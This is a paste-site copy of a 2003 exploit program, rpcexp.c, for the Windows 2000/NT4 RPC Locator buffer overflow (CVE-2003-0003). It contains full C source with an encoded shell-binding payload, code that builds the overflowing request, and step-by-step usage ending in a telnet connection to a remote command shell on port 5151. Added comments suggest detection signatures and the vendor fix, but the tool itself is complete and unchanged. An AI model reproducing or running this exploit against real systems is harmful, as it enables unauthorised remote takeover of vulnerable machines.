Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow - CVE-2003-0003

  1. /****************************************************************************
  2. rpcexp.c
  3. RPC LOCATOR Exploit
  4. Author: Marcin Wolak
  5. mail: mwolak11@wp.pl
  6. Last update: 30 march 2003
  7. ****************************************************************************/
  8.  
  9. /*****************************************************************************
  10. About Compilation:
  11. What you need to compile rpcexp.c:
  12. 1. MS Platform SDK (August SDK is sufficient).
  13. Compiler (e.g. MS Visual C++ 6.0).
  14. rpcns4.lib is needed for linking.
  15. *****************************************************************************/
  16.  
  17. /*****************************************************************************
  18. Usage (You want to exploit remote Windows 2000 system (w2khost) with running RPC
  19. Locator Service):
  20. 1. Set registry values in Your workstation as below:
  21. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\NameService\NetworkAddress = w2khost
  22. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\NameService\ServerNetworkAddress = w2khost
  23. 2. Establish null session:
  24. net use \\w2khost\ipc$ ""/u: ""
  25. 3. Run Exploit:
  26. rpcexp.exe /os w2ksp3
  27.  
  28. If everything is OK, rpcexp hangs in the console window. You can go to a second
  29. cmd console, run telnet (on port 5151) and get cmd on w2khost - just run
  30. on second console:
  31.  
  32. telnet w2khost 5151
  33.  
  34. WARNING !
  35. With this shellcode You can get remote cmd only once. Second attempt will
  36. be rejected.
  37.  
  38. WARNING !!
  39. Currently only Windows 2000 Sp3 and Windows NT 4 Sp6a are exploitable with
  40. rpcexp.
  41.  
  42. *****************************************************************************/
  43.  
  44. #define UNICODE
  45. #define RPC_UNICODE_SUPPORTED
  46.  
  47. #define NT4SP6ABRD 0x42
  48. #define W2KSP3BRD 0x142
  49.  
  50. #define NT4SP6AJMP 0x0147FBC4
  51. #define W2KSP3JMP 0x0090F8F0
  52.  
  53. #define NT4SP6ALLA 0x77F137BD
  54. #define NT4SP6AGPA 0x77F13FB3
  55.  
  56. #include <stdio.h>
  57. #include <rpc.h>
  58. #include <rpcnsi.h>
  59.  
  60.  
  61. #define PURPOSE \
  62. "RPC Locator exploit utility \n\
  63. Autor: Marcin Wolak - march 2003 \n\
  64. mail: mwolak@gazeta.pl \n\n\
  65. Tested on:\n\n\
  66. Windows 2000 SP3 \n\
  67. Windows NT 4.0 SP6a \n\n\
  68. Only for educational purposes !!!.\n\n\
  69. Usage:\n\
  70. rpcexp.exe /v  - to view rpcexp info.\n\
  71. rpcexp.exe /os w2ksp3 - to exploit Windows 2000 Sp3.\n\
  72. rpcexp.exe /os ntsp6a - to exploit Windows NT 4 Sp6a.\n"
  73.  
  74.  
/*
 * Payload byte string: 38 rows of 20 bytes = 760 bytes, plus the implicit
 * NUL terminator of the string literal.
 *
 * How main() uses it (see main below):
 *   - for the "ntsp6a" target it overwrites the two 32-bit values at byte
 *     offsets 730 and 734; every other byte is identical for both targets;
 *   - it copies 190 32-bit words (760 bytes) of this array into the
 *     entry-name buffer handed to RpcNsBindingLookupBegin.
 *
 * Defender's note: because the bytes are constant apart from offsets
 * 730..737, this array is a direct signature candidate for host-based and
 * network detection of this particular tool (CVE-2003-0003).  The sample
 * is reproduced unchanged; no functional edits are made to it.
 */
char shellcode [] =
"\xEB\x13\x5F\xB9\xCF\x02\xCF\x02\xC1\xE9\x10\x57\x80\x37\x99\x47\xE2\xFA\x5F\xEB"
"\x05\xE8\xE8\xFF\xFF\xFF\x14\x2E\x42\x98\x99\x99\x14\x06\x59\x9B\x99\x99\xCF\x66"
"\x8A\xCE\x14\x06\x5D\x9B\x99\x99\x14\x26\x54\x9B\x99\x99\x10\x5B\x65\xA8\x50\x28"
"\x94\xD0\xA9\x59\x35\x1D\x59\xEC\x60\xCA\xCB\xC8\xCF\xCB\x66\x8A\x32\xC0\xC3\xC2"
"\x7B\x75\xC2\xCA\x14\x02\x59\x9B\x99\x99\xA9\x59\x35\x1D\x59\xEC\x60\xCF\x66\x8A"
"\x10\x5B\xC2\xCA\x14\x02\x5D\x9B\x99\x99\x65\xA8\x50\x28\x9E\xA9\x59\x35\x1D\x59"
"\xEC\x60\xCA\xCB\xC8\xCF\xCB\x66\x8A\x32\xC0\xC3\xC2\x7B\x75\xA8\x59\x2D\x9D\xC9"
"\x58\x71\x9D\xC9\x66\xCE\x55\x10\x5B\xC2\xCA\x14\x02\x25\x99\x99\x99\xA8\x50\x18"
"\x58\xC4\x9B\x99\x99\xC9\x13\x8A\x11\x89\xDA\xD9\x7B\x61\xC1\x14\x02\x15\x99\x99"
"\x99\xCA\xF1\x99\x99\x99\x99\xC9\xC9\xF1\x99\x99\x99\x99\xF1\x99\x99\x99\x99\x66"
"\xCE\x21\xC9\xF1\x99\x89\x99\x99\x66\xCE\x41\xC1\x72\x6D\x70\x9E\x9B\x99\x99\xC6"
"\xCE\x18\x5E\xD5\x99\x99\x99\x10\x67\x18\x5F\x16\x66\x66\x66\xC2\x18\x5A\x39\x99"
"\x99\x99\xCA\xF1\x9B\x9B\x99\x99\x66\xCE\x7D\xA8\x59\xC9\xD9\xC9\xD9\xC9\x66\xCE"
"\x71\x0A\xF1\x89\x99\x99\x99\xCF\xCA\x66\xCE\x75\xF1\x9B\x99\x99\x99\xCA\x66\xCE"
"\x69\xA8\x59\xCE\xC9\x29\x95\x32\xC1\x32\xD9\x32\xC6\xD1\xC9\xCE\xCF\x34\xCF\x66"
"\xCE\x25\xD1\xC9\xCE\x34\xCF\x34\xCF\x66\xCE\x25\xD1\x29\xDD\x10\x9E\xCE\x66\xCE"
"\x59\xA8\x59\x12\xDF\x6D\x10\xDE\xA5\x10\xDE\xD9\x12\x9F\x10\xDE\xA1\xA8\x59\xFF"
"\x21\x98\x98\x10\xDE\xB5\xCE\xCE\xA8\x59\xC9\xC9\xC9\xD9\xC9\xD1\xC9\xC9\x34\xCF"
"\xA8\x59\xC9\x66\xCE\x5D\x66\xEF\x69\x66\xCE\x79\x66\xEF\x65\x66\xCE\x79\xD1\xC9"
"\xC9\xCA\x66\xCE\x6D\x10\x5A\xA8\x59\x2D\x9D\xC9\x58\x71\x9D\xC9\x66\xCE\x55\x10"
"\x5F\xA8\x59\x10\x58\x2C\x9D\xC9\xC9\xCE\xC8\xCF\x66\xEE\x0A\x66\xCE\x51\x18\xA6"
"\x98\x99\x99\x99\xE5\xBC\xA8\x59\xC9\xCE\x66\xAE\xCF\x66\xEE\x0A\x66\xCE\x4D\x90"
"\x59\xED\x8D\xA8\x59\xC9\x66\xAE\xCF\xCA\x66\xCE\x61\xF1\xC9\x99\x99\x99\x66\xCE"
"\x41\x72\x5B\xA8\x59\xC9\x2D\x9D\xC9\xCF\xCA\x66\xCE\x65\xCE\xA8\x50\xC8\xC9\xCF"
"\x66\xEE\x0E\x66\xCE\x49\xF1\xC9\x99\x99\x99\x66\xCE\x41\x72\x38\xC9\x66\xCE\x45"
"\x09\xD2\xDC\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD"
"\x99\xDA\xEB\xFC\xF8\xED\xFC\xCD\xF1\xEB\xFC\xF8\xFD\x99\xDA\xEB\xFC\xF8\xED\xFC"
"\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8"
"\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xC9\xFC\xFC\xF2"
"\xD7\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6"
"\xFA\x99\xCE\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC"
"\x99\xCA\xF5\xFC\xFC\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xDA"
"\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xCE\xCA\xD6\xDA\xD2\xAA\xAB\x99\xCE"
"\xCA\xD8\xCA\xED\xF8\xEB\xED\xEC\xE9\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7"
"\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD"
"\x99\xEB\xFC\xFA\xEF\x99\x9B\x99\x8D\x86\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\xFA\xF4\xFD\xB7\xFC\xE1\xFC\x99\xFD\x06\x71\xEE\x81\x02\x71\xEE\x71\x6D"
"\x64\x66\x66\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
  114.  
/*
 * Print the PURPOSE banner to stderr and terminate the process with
 * exit status 1.  Never returns.
 *
 * pszProgramName is accepted for call-site symmetry only; the banner
 * text is fixed and the argument is not used.
 */
void Usage(char * pszProgramName)
{
    (void) pszProgramName;
    fputs(PURPOSE, stderr);
    exit(1);
}
  120.  
/*
 * Program entry point.
 *
 * Builds an oversized RPC name-service "entry name" in mytab and hands it
 * to RpcNsBindingLookupBegin; that call is what the vulnerable Locator
 * service mishandles (CVE-2003-0003).  Command line: "/v" prints the
 * banner; "/os w2ksp3" or "/os ntsp6a" selects the per-target constants.
 * Anything else goes to Usage(), which exits.
 *
 * Defender's view: the observable artefact is a Locator lookup whose entry
 * name is roughly 3 KB of one repeated 32-bit value with the payload
 * embedded at a fixed offset - far beyond any legitimate entry name, and
 * a reasonable detection signature.  The mitigation is the vendor fix for
 * CVE-2003-0003 and disabling the Locator service where it is not needed.
 *
 * Review notes are added as comments only; no code in this function is
 * changed.  Non-standard points worth knowing when reading it:
 *   - "void ... main" and the missing <string.h>/<stdlib.h> includes rely
 *     on the old MSVC build environment named in the file header;
 *   - pszStrBinding, fSuccess and fContinue are never used;
 *   - PtrLLA/PtrGPA alias a char array through unsigned long* (misaligned,
 *     strict-aliasing UB by the C standard; tolerated by the original x86
 *     MSVC build).
 */
void _CRTAPI1 main(int argc, char **argv)
{
    unsigned short mytab[2000];             // Exploit Buffer (4000 bytes; viewed below as 1000 unsigned longs)
    unsigned char * TmpEntryName  = NULL;       // Temporary Entry.
    unsigned long * EntryName  = NULL;          // 32-bit view of mytab
    unsigned long * TmpPtr  = NULL;             // 32-bit view of shellcode during the copy
    unsigned short * pszStrBinding = NULL;      // unused
    RPC_NS_HANDLE hnsHandle;
    unsigned long NsSntxType = RPC_C_NS_SYNTAX_DEFAULT;
    RPC_STATUS status;
    short fSuccess = 0;                         // unused
    short fContinue = 1;                        // unused
    unsigned long i,k;

    /* Two 32-bit slots inside the payload, patched only for the NT4 target.
     * The stored values are XOR-masked with 0x99999999 before being written. */
    unsigned long * PtrLLA = (unsigned long*) &shellcode[730];
    unsigned long * PtrGPA = (unsigned long*) &shellcode[734];
    /* Per-target constants; defaults are the Windows 2000 SP3 values. */
    unsigned long JMP = W2KSP3JMP;
    unsigned long BORDER = W2KSP3BRD;

    switch(argc){
        case 2:
            if((strlen(argv[1]) == 2) && (!strcmp(argv[1],"/v")))
                Usage(argv[0]);
            else
                printf("Bad arguments !!!\n");
            /* Usage() never returns, so exit(2) is reached only on the
             * "Bad arguments" branch. */
            exit(2);
        case 3:
            if((strlen(argv[1]) == 3) && (strlen(argv[2]) == 6) &&
               (!strcmp(argv[1],"/os")) && (!strcmp(argv[2],"w2ksp3")))
               break;
            if((strlen(argv[1]) == 3) && (strlen(argv[2]) == 6) &&
               (!strcmp(argv[1],"/os")) && (!strcmp(argv[2],"ntsp6a")))
            {
                (*PtrLLA) = NT4SP6ALLA ^ 0x99999999;
                (*PtrGPA) = NT4SP6AGPA ^ 0x99999999;
                JMP = NT4SP6AJMP;
                BORDER = NT4SP6ABRD;
                break;
            }
            /* No break here: an unrecognised "/os" value falls through to
             * default and exits via Usage(). */
        default:
            Usage(argv[0]);

    }

    /* Entry name is built as UTF-16LE: the first four code units spell
     * "/.:/" (the name-service prefix), written byte-wise with 0 high bytes. */
    EntryName = (unsigned long *) mytab;
    TmpEntryName = (unsigned char *) mytab;
    TmpEntryName[0] = '/';
    TmpEntryName[1] = 0;
    TmpEntryName[2] = '.';
    TmpEntryName[3] = 0;
    TmpEntryName[4] = ':';
    TmpEntryName[5] = 0;
    TmpEntryName[6] = '/';
    TmpEntryName[7] = 0;
    /* Fill 32-bit slots 2..767: JMP everywhere except at slot BORDER, where
     * 190 words (760 bytes) of shellcode are copied in and i is advanced
     * past them.  The first `if` writes JMP at slot BORDER just before the
     * copy overwrites it, which is harmless.  Highest index written here
     * is BORDER + 189, within the 1000-slot buffer for both BORDER values. */
    for (i=2;i<768;i++)
    {
        if(i <= BORDER)
            EntryName[i] = JMP;
        if(i == BORDER)
        {
            TmpPtr = (unsigned long*) shellcode;
            for(k = 0;k < 190;k++)
                EntryName[i+k] = TmpPtr[k];
            i += 189;
        }
        if(i > BORDER)
            EntryName[i] = JMP;
    }
    /* Two zero code units terminate the UTF-16 string. */
    EntryName[768] = 0;

      /* Lookup against the name service configured in the registry (see the
       * usage notes in the file header).  The call is not expected to return
       * normally on a vulnerable host; status / exception code are printed
       * for diagnosis.  %x with RPC_STATUS (a long) is tolerated on Win32 only. */
      RpcTryExcept {
          status = RpcNsBindingLookupBegin(NsSntxType,
                                         (unsigned short *) EntryName,
                                         0,
                                         NULL,
                            0,
                            &hnsHandle);
          printf("RpcNsBindingLookupBegin returned 0x%x\n", status);
      }
      RpcExcept(1){
          printf("RPC Runtime raised exception 0x%x\n", RpcExceptionCode());
      }
      RpcEndExcept
} /*End of Main*/
  205.  
  206. // milw0rm.com [2003-04-03]
  207.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement